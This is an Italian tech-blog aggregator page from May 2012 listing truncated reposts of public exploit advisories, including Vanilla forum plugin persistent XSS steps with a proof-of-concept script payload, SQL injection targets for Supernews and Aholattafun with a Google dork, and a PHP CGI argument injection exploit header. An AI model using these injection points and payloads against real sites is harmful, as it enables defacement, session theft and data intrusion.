Il Bloggatore

Crittografia Simmetrica Multi Chiave

24 maggio 2012 - Fonte: http://www.evilsocket.net

Dopo tanto tempo che non scrivevo sul blog, voglio affrontare un argomento sia teorico che pratico partendo da un esperienza che mi è capitata qualche tempo fa.

Per motivi che non sto qui a specificare ( principalmente per sicurezza ) ho avuto la necessità di salvare su un database dei dati sensibili non in chiaro, a dire il vero l'intero database doveva essere criptato in modo tale che anche dopo un eventuale fuoriuscita di dati sarebbe stato inservibile.

Un altro punto importante era che ogni utente che poteva loggarsi al sistema in questione, avrebbe dovuto/potuto decriptare i dati in questione con la propria chiave di accesso, ovviamente diversa da utente ad utente.

Quindi, la domanda era, come posso criptare un dato e renderlo decriptabile con...

Leggi il seguito »

Nessun commento »

Inserito in evilsocket.net, hacking, PHP, Programmazione, sorgenti

PHP CGI Argument Injection Remote Exploit V0.3 – PHP Version

23 maggio 2012 - Fonte: http://www.mondounix.com

<?php
 
 
######################################### www.bugreport.ir ########################################

#

# Title: PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version

# Vendor:                 http://www.php.net
# Vulnerable Version:     PHP up to version 5.3.12 and 5.4.2
# Exploitation:           Remote

Leggi il seguito »

Nessun commento »

Inserito in 0day, ARGUMENT INJECTION, cgi, exploit, linux, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, webapps

Vanilla About Me Plugin Persistant XSS Vulnerability

23 maggio 2012 - Fonte: http://www.mondounix.com

# Title: Vanilla About Me Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + About Me 1.1.1
# http://vanillaforums.org/addon/aboutme-plugin
# http://http://vanillaforums.org
#############################################################
 
Go to http://target.tld/index.php?p=/profile/editme/4/testmember
 
Post your XSS In any of the text fields, for this we used the Real Name Field and the following XSS
 
XSS:
<script>alert('x')</script>
 
Then if a user visits your about me page (http://target.tld/index.php?p=/profile/aboutme/4/testmember) the script will execute
 
#############################################################
 
http://henryhoggard.co.uk

...

Leggi il seguito »

Nessun commento »

Inserito in 0day, ABOUT ME PLUGIN, cross site scripting, exploit, linux, MondoUnix, PHP, Security, Sicurezza, unix, Vanilla, Vulnerabilities, Vulnerability, webapps, XSS

Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability

23 maggio 2012 - Fonte: http://www.mondounix.com

# Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1
 
#http://vanillaforums.org/addon/latestcomment-plugin
 
# http://vanillaforums.org
#############################################################
 
Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.
 
XSS:
<script>alert('x')</script>
 
#############################################################
 
http://henryhoggard.co.uk

...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, LATESTCOMMENT, linux, MondoUnix, PHP, Security, Sicurezza, unix, Vanilla, Vulnerabilities, Vulnerability, webapps, XSS

Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS Vulnerability

23 maggio 2012 - Fonte: http://www.mondounix.com

# Title: Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2
 
http://vanillaforums.org/addon/firstlastnames-plugin
 
# http://vanillaforums.org
#############################################################
 
On Edit your account enter your XSS String in either the first name or last name field.
Then if a user visits your page the XSS will execute.
 
http://target.tld/index.php?p=/profile/myprofile/1/user
 
XSS:
<script>alert('x')</script>
 
#############################################################
 
http://henryhoggard.co.uk

...

Leggi il seguito »

Nessun commento »

Inserito in 0day, cross site scripting, exploit, linux, MondoUnix, PHP, Security, Sicurezza, unix, Vanilla, Vulnerabilities, Vulnerability, webapps, XSS

PHP 5.4: le novità

23 maggio 2012 - Fonte: http://www.fabionatalucci.it

E' stato rilasciato la nuova versione del linguaggio più usato del web. Php è arrivato alla versione 5.4. Grandi cambiamenti sono in atto per questo linguaggio. Molte integrazioni non sono state...

Leggi il post completo

...

Leggi il seguito »

Nessun commento »

Inserito in Fabio Natalucci, PHP, php 5.4

Supernews 2.6.1 SQL Injection Exploit

22 maggio 2012 - Fonte: http://www.mondounix.com

<?php
# Exploit Title: Supernews <= 2.6.1 SQL Injection Exploit
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Date: 2012/
# Author: WhiteCollarGroup
# Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
# Version: 2.6.1
# Tested on: Debian...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, linux, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, SUPERNEWS, unix, Vulnerabilities, Vulnerability, webapps

Aholattafun Creative Solutions SQL Injection Vulnerabilities

22 maggio 2012 - Fonte: http://www.mondounix.com

================================================
# Exploit Title: Aholattafun Creative Solutions SQL Injection Vulnerabilities
# Author: Becax
# Home : CrimeIRCD
# Vendor :http://www.aholattafun.com/
---------------------------------------------------------------------!
# Email : tomier2010@yahoo.com
# Category: [webapps]
# Version: n/a
# Google dork: : think about :D
# Tested on: win XP
---------------------------------------------------------------------!
# Exploit 1 : http://localhost/view-category.php?cat=1
# exploit 2: http://localhost/index-view-calendar-detail.php?id=944
# Exploit 3: http://localhost/viewproduct.php?product=141
# Exploit 4: more, you can make experiment for that
---------------------------------------------------------------------!
Special...

Leggi il seguito »

Nessun commento »

Inserito in 0day, AHOLATTAFUN CREATIVE SOLUTIONS, exploit, linux, MondoUnix, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

Nogod – SQL Injection Vulnerability

19 maggio 2012 - Fonte: http://www.mondounix.com

 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local,...

Leggi il seguito »

Nessun commento »

Inserito in 0day, exploit, explot, linux, MondoUnix, NOGOD, PHP, remote, Security, Sicurezza, sql injection, SQL-I, unix, Vulnerabilities, Vulnerability, webapps

Web Evolution 1.0 – 1.6 XSS Presistent Vulnerability

19 maggio 2012 - Fonte: http://www.mondounix.com

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1...

Leggi il seguito »

Nessun commento »

Inserito in 0day, CMS, cross site scripting, exploit, linux, MondoUnix, PHP, remote, Security, Sicurezza, unix, Vulnerabilities, Vulnerability, WEB EVOLUTION, webapps, XSS

«1 234 5 »10 20 30...Ultima »

- <a href='http://advertise.ilbloggatore.com/www/delivery/ck.php?n=af7bf9b6&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://advertise.ilbloggatore.com/www/delivery/avw.php?zoneid=84&cb=INSERT_RANDOM_NUMBER_HERE&n=af7bf9b6&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a>
  
  <a href='http://advertise.ilbloggatore.com/www/delivery/ck.php?n=aac6cde3&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://advertise.ilbloggatore.com/www/delivery/avw.php?zoneid=85&cb=INSERT_RANDOM_NUMBER_HERE&n=aac6cde3&ct0=INSERT_CLICKURL_HERE' border='0' alt='' /></a>
  
  Pronostici Calcio | Previsioni Lotto | Roulette
  Estrazione Euro jackpot
- Iscriviti ai nostri feeds: è gratis! Potrai essere sempre aggiornato su tutte le notizie e le novità provenienti dal mondo informatico! Il tutto IN MODO ASSOLUTAMENTE GRATUITO!!!

Iscriviti gratis alla newsletter

e ricevi una mail al giorno con 20 notizie tratte da
"Il Bloggatore"
Inserisci la tua email:

Ultime Recensioni

I vostri ultimi commenti

Andrea: ma funziona con versione firmware 3.66 ?... o si intende fino alla 3.60...
Eva88: M007124 per favore :( lo cerco da una vita...
TRATT: curantes mi dispiace deluderti ma se ti da locked 13 significa che hai terminato...
nour: curantes deve trovare il seriale m......che si trova nella parte sopra della rad...
nour: raffaele ecco i tuo cod.8746...

La classifica:
I blog più attivi

Antipixel e Loghi

<a href="http://www.ilbloggatore.com/" title="Il Bloggatore"><img src="http://images.ilbloggatore.com/ilbloggatore.png" border="0" alt="Il Bloggatore" /></a>

Back to Top

Il presente portale è tutelato dallo Studio Legale Maggesi di Roma - Diritto Internet - Diritto Civile - Diritto Societario